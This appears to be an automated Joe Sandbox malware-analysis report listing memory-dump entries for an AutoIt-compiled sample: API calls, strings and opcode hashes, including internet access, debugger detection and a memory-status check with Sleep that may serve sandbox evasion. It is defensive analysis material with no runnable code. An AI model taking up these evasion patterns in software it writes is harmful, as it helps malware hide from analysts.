                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Connection_wcslen
                                                      • String ID: *$LPT
                                                      • API String ID: 1725874428-3443410124
                                                      • Opcode ID: 046c26d97a23765cd9b858c4f8ee9539081d7f7c2772617a3bba12aee7b6af2a
                                                      • Instruction ID: 3b8c979278fe44f816257019038bdf17aca4f8f34a0398f2a8dfcf15140da20b
                                                      • Opcode Fuzzy Hash: 046c26d97a23765cd9b858c4f8ee9539081d7f7c2772617a3bba12aee7b6af2a
                                                      • Instruction Fuzzy Hash: 3C918275E002159FDB14DF54C484EAABBF1BF54318F188099E80A9F3A2D735ED86DB90
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00F4E30D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 0b1466e5b49c7ca93b480bffbbbb3b6dca63701e6de93e13a36f8c693c5b49d8
                                                      • Instruction ID: cabd683f0ce63fc297175b1020fb8b45723db8b4984a61d005fed20a5a6d3048
                                                      • Opcode Fuzzy Hash: 0b1466e5b49c7ca93b480bffbbbb3b6dca63701e6de93e13a36f8c693c5b49d8
                                                      • Instruction Fuzzy Hash: BD515D61E0C30697CB167B14ED0277A3FA4FB40762F304958EDD5432E9EB358C99BA46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: d3942b605a8b56775fcc8d8e717c89f70610cf37b1f3a2bff60cfb59319d6c8c
                                                      • Instruction ID: 7ea5399800a741f86912c4c112e21beee4051ebf944ecb4d0ad29b6dd0445c55
                                                      • Opcode Fuzzy Hash: d3942b605a8b56775fcc8d8e717c89f70610cf37b1f3a2bff60cfb59319d6c8c
                                                      • Instruction Fuzzy Hash: C3513635D00246DFDB19DF28C481ABA7BA8EF19320F248097EC659B2C0D638DD53EB52
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00F3F2A2
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F3F2BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00FA57E0
                                                      • _wcslen.LIBCMT ref: 00FA57EC
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY
                                                      • API String ID: 157775604-1150593374
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00F9D130
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F9D13A
                                                      Strings
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00FB3621
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FB365C
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FB461F
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FB4634
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FB327C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FB3287
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      APIs
                                                        • Part of subcall function 00F2600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F2604C
                                                        • Part of subcall function 00F2600E: GetStockObject.GDI32(00000011), ref: 00F26060
                                                        • Part of subcall function 00F2600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2606A
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB377A
                                                      • GetSysColor.USER32(00000012), ref: 00FB3794
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F9CD7D
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F9CDA6
                                                      Strings
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00FB34AB
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FB34BA
                                                      Strings
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00F86CB6
                                                      • _wcslen.LIBCMT ref: 00F86CC2
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F83CCA
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F81D4C
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F83CCA
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F81C46
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F83CCA
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F81CC8
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: 3, 3, 16, 1
                                                      • API String ID: 176396367-3042988571
                                                      • Opcode ID: 8d630afbdd6542ead348bdd6566559c40e4a4c1b876464240d732432c805359a
                                                      • Instruction ID: 95f5b1763029c9beb3d09353e7eba526b40dbf814ae845c6e77b53f11e8529f3
                                                      • Opcode Fuzzy Hash: 8d630afbdd6542ead348bdd6566559c40e4a4c1b876464240d732432c805359a
                                                      • Instruction Fuzzy Hash: C6E02B46614320509231327ADCC1E7F6B8DCFCE760710182BFD81D2266EE98DD92B3A1
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F80B23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 2030045667-4017498283
                                                      • Opcode ID: a5e4ea40ed7e4233b8c00cb13931b81f74c08739fd8e56f4b28795a3e2b6818e
                                                      • Instruction ID: 16f13bb8a66049827ea1b11685b48355985dcb14bff04424a8313940cb2161f9
                                                      • Opcode Fuzzy Hash: a5e4ea40ed7e4233b8c00cb13931b81f74c08739fd8e56f4b28795a3e2b6818e
                                                      • Instruction Fuzzy Hash: 6DE0483264435827E21437957C47FCA7E848F05F65F200426FB58955C38EE564947AE9
                                                      APIs
                                                        • Part of subcall function 00F3F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F40D71,?,?,?,00F2100A), ref: 00F3F7CE
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00F2100A), ref: 00F40D75
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F2100A), ref: 00F40D84
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F40D7F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 55579361-631824599
                                                      • Opcode ID: 61e2981e7081ce1eadab9da317986c1db0edf4f26a6ef9927b2b5d444223435a
                                                      • Instruction ID: 33f3ed4bf5e7b5d0a84f2a60c9d92b7d53f7c9bf342c876226ddaba39ea85de7
                                                      • Opcode Fuzzy Hash: 61e2981e7081ce1eadab9da317986c1db0edf4f26a6ef9927b2b5d444223435a
                                                      • Instruction Fuzzy Hash: FCE06D706003118BD3209FB9E8447527FF4AF04740F004A2DE982C6652DFB5E448AFA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      • API String ID: 481472006-1077770165
                                                      • Opcode ID: 064727106af66b40e998ebf7d57e3cbd29ec997401f7a6923032a295a982c572
                                                      • Instruction ID: 8bfdb4e4707b754803ca21ccc08054a4adbef11b079f5d9653d916ba3341c40a
                                                      • Opcode Fuzzy Hash: 064727106af66b40e998ebf7d57e3cbd29ec997401f7a6923032a295a982c572
                                                      • Instruction Fuzzy Hash: 9ED012A2C08109EACB90A6D0DC45ABAB37CAF48311F90C453F90AE1041D624C509FB63
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FB236C
                                                      • PostMessageW.USER32(00000000), ref: 00FB2373
                                                        • Part of subcall function 00F8E97B: Sleep.KERNEL32 ref: 00F8E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 019fb855c170c5ca6f5895c270bc417c10e2dea2b98775655177cd7d9ad4508a
                                                      • Instruction ID: bc029d2ccc84c173ce454c5ca4b72c06ee808f7f49bd5878385f9f741e56f00c
                                                      • Opcode Fuzzy Hash: 019fb855c170c5ca6f5895c270bc417c10e2dea2b98775655177cd7d9ad4508a
                                                      • Instruction Fuzzy Hash: 1DD0A9323C03047AE264B730DC4FFC776049B04B00F000A02B285EA0D0C8E0A8009A84
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FB232C
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FB233F
                                                        • Part of subcall function 00F8E97B: Sleep.KERNEL32 ref: 00F8E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 5e03ea21cd1e97e7809e478c0c40e5159cc756f17fd130c68977de2ca9a054e9
                                                      • Instruction ID: 7345a5599651cf8ed9528f04f0236051d859e4c88bbf15d3bc511329aee748d9
                                                      • Opcode Fuzzy Hash: 5e03ea21cd1e97e7809e478c0c40e5159cc756f17fd130c68977de2ca9a054e9
                                                      • Instruction Fuzzy Hash: D5D0A932380304B6E264B730DC4FFD77A049B00B00F000A02B289AA0D0C8E0A8009A80